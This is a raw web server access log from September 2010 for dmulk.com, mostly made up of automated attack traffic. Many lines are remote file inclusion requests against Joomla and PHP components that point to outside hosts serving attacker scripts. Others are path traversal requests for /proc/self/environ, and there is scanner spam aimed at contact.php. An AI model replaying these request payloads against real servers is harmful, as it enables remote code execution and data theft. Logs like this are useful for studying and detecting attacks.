77.221.145.35 - - [02/Sep/2010:12:42:29 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:42:29 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
118.129.166.221 - - [02/Sep/2010:12:42:30 -0700] "GET /logs/http://wonderfulcs.com/data/ray.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:42:38 -0700] "POST /logs/access_080316.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
93.114.41.85 - - [02/Sep/2010:12:42:43 -0700] "POST /logs/access_090322.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
93.114.41.85 - - [02/Sep/2010:12:42:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
118.129.166.221 - - [02/Sep/2010:12:42:44 -0700] "GET /logs/access_091206.log/http://wonderfulcs.com/data/ray.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
93.114.41.85 - - [02/Sep/2010:12:42:44 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:42:45 -0700] "GET /logs/access_091206.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:12:43:44 -0700] "GET /logs/access_090913.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:12:43:44 -0700] "GET /logs/access_090815.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:12:43:54 -0700] "GET /plans/?S=D HTTP/1.0" 200 1095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:12:44:03 -0700] "GET /logs/access_071129.log HTTP/1.0" 200 76564 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.157.4.41 - - [02/Sep/2010:12:44:04 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.2; http://dmulk.com/blog" "dmulk.com"
207.58.129.29 - - [02/Sep/2010:12:44:04 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.831" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:44:28 -0700] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:44:28 -0700] "GET /logs/access_100601.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:44:28 -0700] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:44:34 -0700] "GET /logs/access_100601.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:44:34 -0700] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:44:37 -0700] "GET /logs/access_100127.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:44:37 -0700] "GET /logs/access_090829.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:44:43 -0700] "GET /logs/access_100127.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:44:48 -0700] "GET /logs/access_090829.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:12:45:17 -0700] "GET /logs/access_090313.log HTTP/1.0" 200 2329698 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.121.191.57 - - [02/Sep/2010:12:45:20 -0700] "GET /logs/access_100309.log' HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:45:39 -0700] "GET /logs/access_091025.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:45:43 -0700] "GET /logs/access_091206.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:12:45:46 -0700] "GET /bikes/dteel/Temp/?S=D HTTP/1.0" 200 967 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:45:48 -0700] "GET /logs/access_100218.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:45:48 -0700] "GET /logs/access_100130.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:45:48 -0700] "GET /logs/access_090811.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:45:53 -0700] "GET /logs/access_090305.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:45:57 -0700] "GET /logs/access_100509.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:46:26 -0700] "GET /logs/access_080313.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:46:31 -0700] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:46:31 -0700] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:46:54 -0700] "GET /logs/access_100405.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:47:02 -0700] "GET /logs/access_091108.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:47:02 -0700] "GET /logs/access_081024.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:47:07 -0700] "GET /logs/access_100401.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:47:12 -0700] "GET /logs/access_080614.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:47:12 -0700] "GET /logs/access_090907.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:47:15 -0700] "GET /logs/access_080904.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:47:15 -0700] "GET /logs/access_100815.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:47:18 -0700] "GET /logs/access_090514.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:12:47:23 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:12:47:23 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:12:47:23 -0700] "POST /logs/access_081230.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
207.58.129.29 - - [02/Sep/2010:12:48:21 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.831" "www.dmulk.com"
211.234.107.233 - - [02/Sep/2010:12:49:26 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.as-fan.com/bbs/icon/private_icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.234.107.233 - - [02/Sep/2010:12:49:26 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.as-fan.com/bbs/icon/private_icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.234.107.233 - - [02/Sep/2010:12:49:26 -0700] "GET /logs/access_080331.log%20%20/skin/zero_vote/ask_password.php?dir=http://www.as-fan.com/bbs/icon/private_icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.234.107.233 - - [02/Sep/2010:12:49:29 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.as-fan.com/bbs/icon/private_icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.234.107.233 - - [02/Sep/2010:12:49:29 -0700] "GET /logs/access_080331.log%20%20/skin/zero_vote/ask_password.php?dir=http://www.as-fan.com/bbs/icon/private_icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.234.107.233 - - [02/Sep/2010:12:49:29 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.as-fan.com/bbs/icon/private_icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
110.45.146.84 - - [02/Sep/2010:12:51:25 -0700] "GET /logs/access.log//////?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "dmulk.com"
110.45.146.84 - - [02/Sep/2010:12:51:26 -0700] "GET /////?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68613 "-" "libwww-perl/5.79" "dmulk.com"
110.45.146.84 - - [02/Sep/2010:12:51:29 -0700] "GET /logs//////?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167704 "-" "libwww-perl/5.79" "dmulk.com"
87.0.81.185 - - [02/Sep/2010:12:51:37 -0700] "GET /logs/access_080515.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://127.0.0.1/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
207.58.129.29 - - [02/Sep/2010:12:52:05 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "dmulk.com"
207.58.129.29 - - [02/Sep/2010:12:52:06 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.831" "dmulk.com"
207.58.129.29 - - [02/Sep/2010:12:52:10 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:53:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:53:37 -0700] "POST /logs/access_081025.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:53:40 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
66.111.53.48 - - [02/Sep/2010:12:54:49 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.810" "www.dmulk.com"
93.114.41.85 - - [02/Sep/2010:12:54:59 -0700] "POST /logs/access_090320.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
124.121.191.57 - - [02/Sep/2010:12:55:20 -0700] "GET /logs/access_080114.log' HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)" "www.dmulk.com"
207.58.129.29 - - [02/Sep/2010:12:55:21 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68481 "-" "libwww-perl/5.831" "www.dmulk.com"
207.58.129.29 - - [02/Sep/2010:12:55:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.831" "www.dmulk.com"
66.111.53.48 - - [02/Sep/2010:12:56:43 -0700] "GET /logs/access_100524.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
66.111.53.48 - - [02/Sep/2010:12:56:44 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.810" "www.dmulk.com"
66.111.53.48 - - [02/Sep/2010:12:56:47 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:12:56:52 -0700] "GET /logs/access_090118.log HTTP/1.0" 200 3562748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:08 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:08 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:08 -0700] "POST /logs/access_090602.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:09 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:09 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:09 -0700] "POST /logs/access_090602.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:09 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:09 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:10 -0700] "POST /logs/access_090602.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:11 -0700] "POST /logs/access_090602.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:11 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:11 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:11 -0700] "POST /logs/access_090602.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:11 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:12 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:12 -0700] "POST /logs/access_090602.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:12 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:43 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:45 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:46 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:47 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:47 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:57:48 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:58:03 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:58:03 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
72.87.252.58 - - [02/Sep/2010:12:58:20 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/xml/media-rss.php HTTP/1.1" 200 7897 "-" "Apple-PubSub/65.20" "dmulk.com"
207.58.129.29 - - [02/Sep/2010:12:58:27 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "dmulk.com"
207.58.129.29 - - [02/Sep/2010:12:58:27 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.831" "dmulk.com"
207.58.129.29 - - [02/Sep/2010:12:58:28 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:58:51 -0700] "POST /logs/access_080316.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:26 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:26 -0700] "POST /logs/access_090602.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:27 -0700] "POST /logs/access_090602.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:27 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:28 -0700] "POST /logs/access_090602.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:28 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:28 -0700] "POST /logs/access_090602.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:29 -0700] "POST /logs/access_090602.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:29 -0700] "POST /logs/access_090602.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:30 -0700] "POST /logs/access_090602.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:32 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:32 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:36 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:12:59:36 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
69.162.80.226 - - [02/Sep/2010:12:59:50 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
69.162.80.226 - - [02/Sep/2010:12:59:52 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
207.58.129.29 - - [02/Sep/2010:13:00:00 -0700] "GET /logs/access_100524.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
207.58.129.29 - - [02/Sep/2010:13:00:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.831" "www.dmulk.com"
207.58.129.29 - - [02/Sep/2010:13:00:03 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
67.195.114.58 - - [02/Sep/2010:13:00:10 -0700] "GET /blog/index.php/category/motorcycles/feed/ HTTP/1.0" 200 1813 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
82.141.136.11 - - [02/Sep/2010:13:01:59 -0700] "POST /logs/access_100824.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:13:01:59 -0700] "POST /logs//contact.php HTTP/1.0" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:13:02:02 -0700] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://wenda.zoomshare.com/files/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:13:02:18 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:13:02:18 -0700] "POST /logs/access_100824.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:13:02:18 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
